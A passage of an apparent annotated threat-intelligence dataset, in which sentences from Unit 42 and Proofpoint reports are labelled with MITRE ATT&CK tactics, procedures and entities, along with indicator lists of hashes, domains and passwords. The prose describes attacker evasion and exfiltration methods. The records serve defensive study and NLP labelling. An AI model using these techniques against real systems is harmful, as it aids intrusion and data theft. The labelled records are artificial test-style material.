{ "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Modify source code to evade detection.", "entities": [ { "text": "malware developers", "start": 4, "end": 22, "label": "ThreatActor" }, { "text": "made small modifications to the source code in an attempt to evade detection", "start": 23, "end": 99, "label": "Action" }, { "text": "source code", "start": 55, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-15_aptnotes_report-p15-s96-9f0518", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 15, "sentence_id": 96, "context_before": "The malware developers made small modifications to the source code in an attempt to evade detection.", "sentence_text": "Some samples used a domain hard-coded in plain text to establish the DNS covert channel (as shown in Figure 15), whereas other samples used a Base64 encoded string.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Malware samples establish a DNS covert channel using hard-coded domains or Base64-encoded strings", "entities": [ { "text": "Some samples", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "used a domain hard-coded in plain text to establish the DNS covert channel", "start": 13, "end": 87, "label": "Action" }, { "text": "domain hard-coded in plain text", "start": 20, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "used a Base64 encoded string", "start": 135, "end": 163, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p15-s97-d20a33", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 15, "sentence_id": 97, "context_before": "Some samples used a domain hard-coded in plain text to establish the DNS covert channel (as shown in Figure 15), whereas other samples used a Base64 encoded string.", "sentence_text": "Aside from the Base64 feature, the differences are in the settings and not in the actual source code, except for the sample with SHA256 hash 354048e6006ec9625e3e5e3056790afe018e70da916c2c1a9cb4499f83888a47.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p15-s99-4da378", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 15, "sentence_id": 99, "context_before": "UTC.", "sentence_text": "As shown in Figure 16, the threat actor also tried to obfuscate the constant cmd.exe to avoid signature-based detections.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Threat actor attempts to obfuscate the cmd.exe string to evade signature-based detection", "entities": [ { "text": "the threat actor", "start": 23, "end": 39, "label": "ThreatActor" }, { "text": "cmd.exe", "start": 77, "end": 84, "label": "MalwareTool" }, { "text": "tried to obfuscate the constant cmd.exe to avoid signature-based detections", "start": 45, "end": 120, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p15-s100-0de0b4", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 15, "sentence_id": 100, "context_before": "As shown in Figure 16, the threat actor also tried to obfuscate the constant cmd.exe to avoid signature-based detections.", "sentence_text": "They did so by using the equivalent Base64 encoded value with the added constant 399 so the equivalent Base64 encoded string can’t be detected through signatures.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Obfuscate command string using Base64 encoding with added constant to evade signature detection.", "entities": [ { "text": "using the equivalent Base64 encoded value with the added constant 399", "start": 15, "end": 84, "label": "Action" }, { "text": "Base64 encoded value", "start": 36, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "Base64 encoded string", "start": 103, "end": 124, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-15_aptnotes_report-p16-s102-5446f2", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 16, "sentence_id": 102, "context_before": "15/22", "sentence_text": "Data Exfiltration\ninformation, such as emails from MS Exchange environments, using PowerShell snap-ins to dump the emails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p16-s103-52b677", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 16, "sentence_id": 103, "context_before": "Data Exfiltration\ninformation, such as emails from MS Exchange environments, using PowerShell snap-ins to dump the emails.", "sentence_text": "After dumping the emails, the threat actor tried to compress the .pst file with a command-line RAR tool before exfiltrating it:", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1560", "name": "Archive Collected Data" } ], "procedure": "Threat actor compresses collected email data (.pst file) using a RAR tool prior to exfiltration", "entities": [ { "text": "the threat actor", "start": 26, "end": 42, "label": "ThreatActor" }, { "text": "command-line RAR tool", "start": 82, "end": 103, "label": "MalwareTool" }, { "text": "compress the .pst file with a command-line RAR tool", "start": 52, "end": 103, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p16-s104-1114d5", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 16, "sentence_id": 104, "context_before": "After dumping the emails, the threat actor tried to compress the .pst file with a command-line RAR tool before exfiltrating it:", "sentence_text": "However, the threat actor canceled the attempt to compress the .pst file by using the tool taskkill.exe approximately eight minutes later.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Cancel compression process using taskkill.exe.", "entities": [ { "text": "the threat actor", "start": 9, "end": 25, "label": "ThreatActor" }, { "text": "canceled the attempt to compress the .pst file by using the tool taskkill.exe", "start": 26, "end": 103, "label": "Action" }, { "text": "taskkill.exe", "start": 91, "end": 103, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p16-s105-595634", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 16, "sentence_id": 105, "context_before": "However, the threat actor canceled the attempt to compress the .pst file by using the tool taskkill.exe approximately eight minutes later.", "sentence_text": "Eventually the threat actor discarded the usage of raren.exe and simply renamed the .pst file, moving it to the IIS root directory and mimicking an error log in a compressed file to download it through the web server.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Rename .pst file, move it to IIS root directory, masquerade it as error log, and download it through web server.", "entities": [ { "text": "the threat actor", "start": 11, "end": 27, "label": "ThreatActor" }, { "text": "discarded the usage of raren.exe", "start": 28, "end": 60, "label": "Action" }, { "text": "renamed the .pst file", "start": 72, "end": 93, "label": "Action" }, { "text": "moving it to the IIS root directory", "start": 95, "end": 130, "label": "Action" }, { "text": "mimicking an error log in a compressed file", "start": 135, "end": 178, "label": "Action" }, { "text": "download it through the web server", "start": 182, "end": 216, "label": "Action" }, { "text": "raren.exe", "start": 51, "end": 60, "label": "MalwareTool" }, { "text": "IIS root directory", "start": 112, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "web server", "start": 206, "end": 216, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-15_aptnotes_report-p16-s106-df4cea", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 16, "sentence_id": 106, "context_before": "Eventually the threat actor discarded the usage of raren.exe and simply renamed the .pst file, moving it to the IIS root directory and mimicking an error log in a compressed file to download it through the web server.", "sentence_text": "And finally, the ai.pst file is removed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The attacker removes a file from the system to clean up artifacts.", "entities": [ { "text": "is removed", "start": 29, "end": 39, "label": "Action" }, { "text": "ai.pst", "start": 17, "end": 23, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-15_aptnotes_report-p17-s108-d7576b", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 108, "context_before": "16/22", "sentence_text": "This process is repeated for several mailboxes with different search criteria.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s109-41e155", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 109, "context_before": "This process is repeated for several mailboxes with different search criteria.", "sentence_text": "In addition to the email exfiltration, Unit 42 researchers identified exfiltration of the victim’s Roaming Profile.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s110-1d9864", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 110, "context_before": "In addition to the email exfiltration, Unit 42 researchers identified exfiltration of the victim’s Roaming Profile.", "sentence_text": "A Roaming Profile is used to serve the same profile to the user when logging in from different computers from the same Active Directory environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s111-90f765", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 111, "context_before": "A Roaming Profile is used to serve the same profile to the user when logging in from different computers from the same Active Directory environment.", "sentence_text": "To exfiltrate this, the threat actor compressed the directory by using the standalone version of the 7-Zip tool (which they dropped into the system using certutil.exe), and split the compressed file into chunks of 100 MB.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1560.001", "name": "Archive via Utility" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Compress directory using 7-Zip, split archive into chunks, and transfer tool using certutil.exe prior to exfiltration.", "entities": [ { "text": "the threat actor", "start": 20, "end": 36, "label": "ThreatActor" }, { "text": "compressed the directory by using the standalone version of the 7-Zip tool", "start": 37, "end": 111, "label": "Action" }, { "text": "dropped into the system using certutil.exe", "start": 124, "end": 166, "label": "Action" }, { "text": "split the compressed file into chunks of 100 MB", "start": 173, "end": 220, "label": "Action" }, { "text": "7-Zip tool", "start": 101, "end": 111, "label": "MalwareTool" }, { "text": "certutil.exe", "start": 154, "end": 166, "label": "MalwareTool" } ] }, { "uid": "aptnotes-15_aptnotes_report-p17-s112-397394", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 112, "context_before": "To exfiltrate this, the threat actor compressed the directory by using the standalone version of the 7-Zip tool (which they dropped into the system using certutil.exe), and split the compressed file into chunks of 100 MB.", "sentence_text": "Later, following the same procedure, the threat actor exfiltrated the content.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrate content following previously established procedure.", "entities": [ { "text": "the threat actor", "start": 37, "end": 53, "label": "ThreatActor" }, { "text": "exfiltrated the content", "start": 54, "end": 77, "label": "Action" } ] }, { "uid": "aptnotes-15_aptnotes_report-p17-s113-b14c1c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 113, "context_before": "Later, following the same procedure, the threat actor exfiltrated the content.", "sentence_text": "Conclusion\nOur hope in sharing the descriptions of this tool set is that readers can use this information to search their networks to identify other possible attacks using these tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s114-04b508", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 114, "context_before": "Conclusion\nOur hope in sharing the descriptions of this tool set is that readers can use this information to search their networks to identify other possible attacks using these tools.", "sentence_text": "This tool set is not yet associated with a specific threat actor, and not entirely limited to a single cluster or campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s115-fadfb1", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 115, "context_before": "This tool set is not yet associated with a specific threat actor, and not entirely limited to a single cluster or campaign.", "sentence_text": "As mentioned at the beginning of this article, we found an overlapping Ntospy sample with SHA256 bcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df with a previously identified threat activity cluster CL-STA-0043.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s116-0a8b40", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 116, "context_before": "As mentioned at the beginning of this article, we found an overlapping Ntospy sample with SHA256 bcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df with a previously identified threat activity cluster CL-STA-0043.", "sentence_text": "However, the overlaps are not limited to that sample.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s117-c9ba85", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 117, "context_before": "However, the overlaps are not limited to that sample.", "sentence_text": "We have also identified two compromised organizations in common across both activity clusters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p17-s118-75ee5e", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 17, "sentence_id": 118, "context_before": "We have also identified two compromised organizations in common across both activity clusters.", "sentence_text": "Some of the TTPs match on both clusters, such as the MS Exchange PowerShell snap-ins and one of the Network Provider DLL modules.\n17/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p18-s119-47f9a5", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 18, "sentence_id": 119, "context_before": "Some of the TTPs match on both clusters, such as the MS Exchange PowerShell snap-ins and one of the Network Provider DLL modules.\n17/22", "sentence_text": "nation-state related threat actors for the following reasons:\nThe detection and defense evasion techniques used The exfiltration activity observed The victimology The customization level of the tools used The TTPs observed the following products:\nCortex XDR includes detections and protections related to the IoCs shared in this research Advanced URL Filtering and DNS Security blocks related C2 domains as malicious The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research If you think you may have been compromised or have an urgent matter, get in touch with the North America Toll-Free: 866.486.4842 (866.4.UNIT42)\nEMEA: +31.20.299.3130\nAPAC: +65.6983.8730\nJapan: +81.50.1790.0200\nmembers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p18-s120-44c3c8", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 18, "sentence_id": 120, "context_before": "nation-state related threat actors for the following reasons:\nThe detection and defense evasion techniques used The exfiltration activity observed The victimology The customization level of the tools used The TTPs observed the following products:\nCortex XDR includes detections and protections related to the IoCs shared in this research Advanced URL Filtering and DNS Security blocks related C2 domains as malicious The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research If you think you may have been compromised or have an urgent matter, get in touch with the North America Toll-Free: 866.486.4842 (866.4.UNIT42)\nEMEA: +31.20.299.3130\nAPAC: +65.6983.8730\nJapan: +81.50.1790.0200\nmembers.", "sentence_text": "CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p18-s121-c09d6a", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 18, "sentence_id": 121, "context_before": "CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.", "sentence_text": "Learn more about the Cyber Threat Alliance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p18-s122-a63a16", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 18, "sentence_id": 122, "context_before": "Learn more about the Cyber Threat Alliance.", "sentence_text": "ID Name\nT1003 OS Credential Dumping T1018 Remote System Discovery T1021.006 Remote Services: Windows Remote Management 18/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p19-s123-ebcd08", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 19, "sentence_id": 123, "context_before": "ID Name\nT1003 OS Credential Dumping T1018 Remote System Discovery T1021.006 Remote Services: Windows Remote Management 18/22", "sentence_text": "T1027.009 Obfuscated Files or Information: Embedded Payloads T1030 Data Transfer Size Limits T1036.005 Masquerading: Match Legitimate Name or Location T1036.008 Masquerading: Masquerade File Type T1041 Exfiltration", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p19-s124-47fdb1", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 19, "sentence_id": 124, "context_before": "T1027.009 Obfuscated Files or Information: Embedded Payloads T1030 Data Transfer Size Limits T1036.005 Masquerading: Match Legitimate Name or Location T1036.008 Masquerading: Masquerade File Type T1041 Exfiltration", "sentence_text": "Over C2 Channel T1046 Network Service Discovery T1047 Windows Management Instrumentation T1053.005 Scheduled Task/Job: Scheduled Task T1059.001 Command and Scripting Interpreter: PowerShell T1059.003 Command and Scripting Interpreter: Windows Command Shell T1070.004 Indicator Removal: File Deletion T1070.006 Indicator Removal: Timestomp T1071.004 Application Layer Protocol: DNS T1074 Data Staged T1078.002 Valid Accounts: Domain Accounts T1087.002 Account Discovery: Domain Account T1112 Modify Registry T1114 Email Collection T1132.001 Data Encoding: Standard Encoding T1136.002 Create Account: Domain Account T1140 Deobfuscate/Decode Files or Information T1505.003 Server Software Component: Web Shell T1556.008 Modify Authentication Process: Network Provider DLL T1560.001 Archive Collected Data: Archive via", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p19-s125-3a84ba", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 19, "sentence_id": 125, "context_before": "Over C2 Channel T1046 Network Service Discovery T1047 Windows Management Instrumentation T1053.005 Scheduled Task/Job: Scheduled Task T1059.001 Command and Scripting Interpreter: PowerShell T1059.003 Command and Scripting Interpreter: Windows Command Shell T1070.004 Indicator Removal: File Deletion T1070.006 Indicator Removal: Timestomp T1071.004 Application Layer Protocol: DNS T1074 Data Staged T1078.002 Valid Accounts: Domain Accounts T1087.002 Account Discovery: Domain Account T1112 Modify Registry T1114 Email Collection T1132.001 Data Encoding: Standard Encoding T1136.002 Create Account: Domain Account T1140 Deobfuscate/Decode Files or Information T1505.003 Server Software Component: Web Shell T1556.008 Modify Authentication Process: Network Provider DLL T1560.001 Archive Collected Data: Archive via", "sentence_text": "Utility T1564.002", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p19-s126-eb769e", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 19, "sentence_id": 126, "context_before": "Utility T1564.002", "sentence_text": "Hide Artifacts: Hidden Users T1570 Lateral Tool Transfer 19/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p20-s127-615d96", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 20, "sentence_id": 127, "context_before": "Hide Artifacts: Hidden Users T1570 Lateral Tool Transfer 19/22", "sentence_text": "T1573.001 Encrypted Channel: Symmetric Cryptography T1583.001 Acquire Infrastructure: Domains T1583.002 Acquire Infrastructure: DNS Server T1587.001 Develop Capabilities: Malware Indicators of Compromise IoC Type 2632bcd0715a7223bda1779e107087964037039e1576d2175acaf61d3759360f SHA256 ae989e25a50a6faa3c5c487083cdb250dde5f0ecc0c57b554ab77761bdaed996 SHA256 C:\\Windows\\Temp\\install.bat File path c:/programdata/microsoft/~ntuserdata.msu File path c:/programdata/packag~1/windows 6.1-kb4537803.msu File path c:/programdata/package cache/windows10.0-kb5009543-x64.msu File path c:/programdata/package cache/windows10.0-kb5000736-x64.msu File path credman Network provider name HKLM\\SYSTEM\\CurrentControlSet\\Services\\credman", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p20-s128-5163a9", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 20, "sentence_id": 128, "context_before": "T1573.001 Encrypted Channel: Symmetric Cryptography T1583.001 Acquire Infrastructure: Domains T1583.002 Acquire Infrastructure: DNS Server T1587.001 Develop Capabilities: Malware Indicators of Compromise IoC Type 2632bcd0715a7223bda1779e107087964037039e1576d2175acaf61d3759360f SHA256 ae989e25a50a6faa3c5c487083cdb250dde5f0ecc0c57b554ab77761bdaed996 SHA256 C:\\Windows\\Temp\\install.bat File path c:/programdata/microsoft/~ntuserdata.msu File path c:/programdata/packag~1/windows 6.1-kb4537803.msu File path c:/programdata/package cache/windows10.0-kb5009543-x64.msu File path c:/programdata/package cache/windows10.0-kb5000736-x64.msu File path credman Network provider name HKLM\\SYSTEM\\CurrentControlSet\\Services\\credman", "sentence_text": "Registry key path c:\\windows\\system32\\ntoskrnl.dll File path C:\\Windows\\Temp\\ntos.dll File path C:\\Windows\\Temp\\ntoskrnl.dll File path e30f8596f1beda8254cbe1ac7a75839f5fe6c332f45ebabff88aadbce3938a19 SHA256 20/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p21-s129-496816", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 21, "sentence_id": 129, "context_before": "Registry key path c:\\windows\\system32\\ntoskrnl.dll File path C:\\Windows\\Temp\\ntos.dll File path C:\\Windows\\Temp\\ntoskrnl.dll File path e30f8596f1beda8254cbe1ac7a75839f5fe6c332f45ebabff88aadbce3938a19 SHA256 20/22", "sentence_text": "1a4301019bdf42e7b2df801e04066a738d184deb22afcad9542127b0a31d5cfa SHA256\ne7682a61b6c5b0487593f880a09d6123f18f8c6da9c13ed43b43866960b7aa8e SHA256\n58e87c0d9c9b190d1e6e44eae64e9a66de93d8de6cbd005e2562798462d05b45 SHA256\n7eb901a6dbf41bcb2e0cdcbb67c53ab722604d6c985317cb2b479f4c4de7cf90 SHA256\nf45ea12579f636026d29009190221864f432dbc3e26e73d8f3ab7835fa595b86 SHA256\nbcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df SHA256\nC:\\temp\\update.exe File path 1dsfjlosdf23dsfdfr", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p21-s130-7776b0", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 21, "sentence_id": 130, "context_before": "1a4301019bdf42e7b2df801e04066a738d184deb22afcad9542127b0a31d5cfa SHA256\ne7682a61b6c5b0487593f880a09d6123f18f8c6da9c13ed43b43866960b7aa8e SHA256\n58e87c0d9c9b190d1e6e44eae64e9a66de93d8de6cbd005e2562798462d05b45 SHA256\n7eb901a6dbf41bcb2e0cdcbb67c53ab722604d6c985317cb2b479f4c4de7cf90 SHA256\nf45ea12579f636026d29009190221864f432dbc3e26e73d8f3ab7835fa595b86 SHA256\nbcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df SHA256\nC:\\temp\\update.exe File path 1dsfjlosdf23dsfdfr", "sentence_text": "Encryptio key b855dfde7f778f99a3724802715a0baa MD5 4351911f266eea8e62da380151a54d5c3fbbc7b08502f28d3224f689f55bffba SHA256 e0748ce315037253f278f7f8f2820c7dd8827a93b6d22d37dafc287c934083c4 SHA256 baed169ce874f6fe721e0d32128484b3048e9bf58b2c75db88d1a8b7d6bb938d SHA256 3a2d0e5e4bfd6db9c45f094a638d1f1b9d07110b9f6eb8874b75d968401ad69c SHA256 4351911f266eea8e62da380151a54d5c3fbbc7b08502f28d3224f689f55bffba SHA256 354048e6006ec9625e3e5e3056790afe018e70da916c2c1a9cb4499f83888a47 SHA256 dee7321085737da53646b1f2d58838ece97c81e3f2319a29f7629d62395dbfd1 SHA256 geostatcdn[.]com Domain telemetry.geostatcdn[.]com Domain fdsb.telemetry.geostatcdn[.]com Domain dlbh.telemetry.geostatcdn[.]com Domain lc3w.telemetry.geostatcdn[.]com Domain hfhs.telemetry.geostatcdn[.]com Domain geoinfocdn[.]com Domain telemetry.geoinfocdn[.]com Domain g1sw.telemetry.geoinfocdn[.]com Domain c:/windows/temp/onedriveupdater.exe File path 21/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p22-s131-c58b83", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 22, "sentence_id": 131, "context_before": "Encryptio key b855dfde7f778f99a3724802715a0baa MD5 4351911f266eea8e62da380151a54d5c3fbbc7b08502f28d3224f689f55bffba SHA256 e0748ce315037253f278f7f8f2820c7dd8827a93b6d22d37dafc287c934083c4 SHA256 baed169ce874f6fe721e0d32128484b3048e9bf58b2c75db88d1a8b7d6bb938d SHA256 3a2d0e5e4bfd6db9c45f094a638d1f1b9d07110b9f6eb8874b75d968401ad69c SHA256 4351911f266eea8e62da380151a54d5c3fbbc7b08502f28d3224f689f55bffba SHA256 354048e6006ec9625e3e5e3056790afe018e70da916c2c1a9cb4499f83888a47 SHA256 dee7321085737da53646b1f2d58838ece97c81e3f2319a29f7629d62395dbfd1 SHA256 geostatcdn[.]com Domain telemetry.geostatcdn[.]com Domain fdsb.telemetry.geostatcdn[.]com Domain dlbh.telemetry.geostatcdn[.]com Domain lc3w.telemetry.geostatcdn[.]com Domain hfhs.telemetry.geostatcdn[.]com Domain geoinfocdn[.]com Domain telemetry.geoinfocdn[.]com Domain g1sw.telemetry.geoinfocdn[.]com Domain c:/windows/temp/onedriveupdater.exe File path 21/22", "sentence_text": "c:/windows/system32/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-15_aptnotes_report-p22-s132-41681c", "source": "aptnotes", "doc_id": "15_aptnotes_report", "page_number": 22, "sentence_id": 132, "context_before": "c:/windows/system32/", "sentence_text": "msmdlb.exe File path c:/windows/temp/onedriveupdater.exe File path c:/program files (x86)/google/update/googleupdate.exe File path c:\\windows\\temp\\mslb.ps1 File path c:\\windows\\temp\\set_time.bat File path c:\\windows\\temp\\pscan.ps1 File path c:\\windows\\temp\\crs.ps1 File path c:\\windows\\temp\\usr.ps1 File path c:\\windows\\temp\\pb.ps1 File path c:\\windows\\temp\\ebat.bat File path c:\\windows\\temp\\pb1.ps1 File path c:\\windows\\temp\\raren.exe File path aabbcc123 Password 086a6618705223a8873448465717e288cf7cc6a3af4d9bf18ddd44df6f400488 SHA256 P@ssw0rd1 Password Assistance$ Username Zaqwsx123 Password 22/22", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p1-s1-09df56", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "Don’t Answer That!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p1-s2-9bd13c", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Don’t Answer That!", "sentence_text": "Russia-Aligned TA499 Beleaguers Targets with Video Call Requests proofpoint.com/us/blog/threat-insight/dont-answer-russia-aligned-ta499-beleaguers-targets-video-call-requests March 1, 2023 Blog Threat Insight Don’t Answer That!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p1-s3-190002", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "Russia-Aligned TA499 Beleaguers Targets with Video Call Requests proofpoint.com/us/blog/threat-insight/dont-answer-russia-aligned-ta499-beleaguers-targets-video-call-requests March 1, 2023 Blog Threat Insight Don’t Answer That!", "sentence_text": "The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "The adversary conducts social engineering campaigns to persuade targets to participate in recorded phone or video communications.", "entities": [ { "text": "attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats", "start": 29, "end": 223, "label": "Action" } ] }, { "uid": "aptnotes-16_aptnotes_report-p1-s4-2d6710", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.", "sentence_text": "TA499 is not a threat to take lightly due to the damage such propaganda could have on the brand and public perception of those targeted as well as the perpetuation of disinformation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p1-s5-c1092e", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "TA499 is not a threat to take lightly due to the damage such propaganda could have on the brand and public perception of those targeted as well as the perpetuation of disinformation.", "sentence_text": "TA499’s campaigns began to ramp up in late January 2022, culminating in increasingly aggressive attempts after Russia invaded Ukraine in late February 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-16_aptnotes_report-p1-s6-2d6d17", "source": "aptnotes", "doc_id": "16_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "TA499’s campaigns began to ramp up in late January 2022, culminating in increasingly aggressive attempts after Russia invaded Ukraine in late February 2022.", "sentence_text": "Since that time, the threat actor has engaged in steady activity and expanded its targeting to include prominent businesspeople and high- profile individuals that have either made large donations to Ukrainian humanitarian efforts or those making public statements about Russian disinformation and propaganda.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 